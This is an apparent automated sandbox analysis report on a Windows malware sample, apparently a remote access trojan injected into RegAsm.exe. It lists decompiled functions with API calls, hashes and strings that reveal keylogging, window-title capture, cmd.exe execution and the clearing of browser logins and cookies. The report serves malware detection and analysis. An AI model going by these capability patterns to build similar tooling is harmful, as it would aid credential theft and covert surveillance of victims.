                                          • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                          Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                          • String ID: bad locale name
                                          • API String ID: 3628047217-1405518554
                                          • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                          • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                          • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                          • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                          Function 10004B39 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FreeHandleLibraryModule
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 662261464-1276376045
                                          • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                          • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                          • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                          • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                          Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                          • ShowWindow.USER32(00000009), ref: 00416C9C
                                          • SetForegroundWindow.USER32 ref: 00416CA8
                                            • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                            • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                            • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                            • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                          • String ID: !D@
                                          • API String ID: 186401046-604454484
                                          • Opcode ID: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
                                          • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                          • Opcode Fuzzy Hash: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
                                          • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                          Function 10004ED7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 10007153: GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                            • Part of subcall function 10007153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                            • Part of subcall function 10007153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                            • Part of subcall function 10007153: _free.LIBCMT ref: 100071B8
                                            • Part of subcall function 10007153: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                          • _free.LIBCMT ref: 10004F1D
                                          • _free.LIBCMT ref: 10004F24
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                          • String ID: ,s$,s
                                          • API String ID: 400815659-618054613
                                          • Opcode ID: e0fe51c550968720479aec1141248534f2a92988cecb2e3b51196d93947e3756
                                          • Instruction ID: eaf7f0aa003ddc14549942adb29436a4b3c466950eec5de4e21d931d64d8bd94
                                          • Opcode Fuzzy Hash: e0fe51c550968720479aec1141248534f2a92988cecb2e3b51196d93947e3756
                                          • Instruction Fuzzy Hash: 7BE0E5A6A0D99291F261D23D7D4265E1B45CBC12F5B230226FC249B1CBDDA4D801109D
                                          Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: /C $cmd.exe$open
                                          • API String ID: 587946157-3896048727
                                          • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                          • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                          • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                          • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                          Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.p,004752F0,?,pth_unenc), ref: 0040B8F6
                                          • UnhookWindowsHookEx.USER32 ref: 0040B902
                                          • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: TerminateThread$HookUnhookWindows
                                          • String ID: pth_unenc
                                          • API String ID: 3123878439-4028850238
                                          • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                          • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                          • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                          • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                          Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: GetCursorInfo$User32.dll
                                          • API String ID: 1646373207-2714051624
                                          • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                          • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                          • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                          • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                          Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                          • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetLastInputInfo$User32.dll
                                          • API String ID: 2574300362-1519888992
                                          • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                          • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                          • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                          • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                          Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __alldvrm$_strrchr
                                          • String ID:
                                          • API String ID: 1036877536-0
                                          • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                          • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                          • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                          • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                          Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                          • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                          • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                          • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                          Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                          • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                          • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                          • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                          Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                          • __freea.LIBCMT ref: 100087D5
                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                          • String ID:
                                          • API String ID: 2652629310-0
                                          • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                          • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                          • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                          • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                          Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Cleared browsers logins and cookies., xrefs: 0040C130
                                          • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                          • API String ID: 3472027048-1236744412
                                          • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                          • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                          • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                          • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                          Function 004194FF Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                          • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                          • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                          • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DisplayEnum$Devices$Monitors
                                          • String ID:
                                          • API String ID: 1432082543-0
                                          • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                          • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                          • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                          • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                          Function 00412716 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                          • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQuerySleepValue
                                          • String ID: 8SG$`.p$exepath
                                          • API String ID: 4119054056-2646392161
                                          • Opcode ID: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                                          • Instruction ID: 51bf296395b05d3efeb7b41814c334b1d8e13e95dfba71b8de44539041ec8c28
                                          • Opcode Fuzzy Hash: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                                          • Instruction Fuzzy Hash: 3521F4A1B003042BD604B6365D4AAAF724D8B80318F40897FBA56E72D3DFBC9D45826D
                                          Function 10001CCA Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                          • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$CloseHandleReadSize
                                          • String ID:
                                          • API String ID: 3642004256-0
                                          • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                          • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                          • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                          • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                          Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                            • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                            • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                          • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                          • Sleep.KERNEL32(00000064), ref: 0040A638
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$SleepText$ForegroundLength
                                          • String ID: [ $ ]
                                          • API String ID: 3309952895-93608704
                                          • Opcode ID: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                          • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                          • Opcode Fuzzy Hash: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                          • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                          Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                          • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                          • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                          • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                          Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleOpenProcess
                                          • String ID:
                                          • API String ID: 39102293-0
                                          • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                          • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                          • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                          • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                          Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                            • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                          • _UnwindNestedFrames.LIBCMT ref: 00439911
                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                          • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                          • String ID:
                                          • API String ID: 2633735394-0
                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                          • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
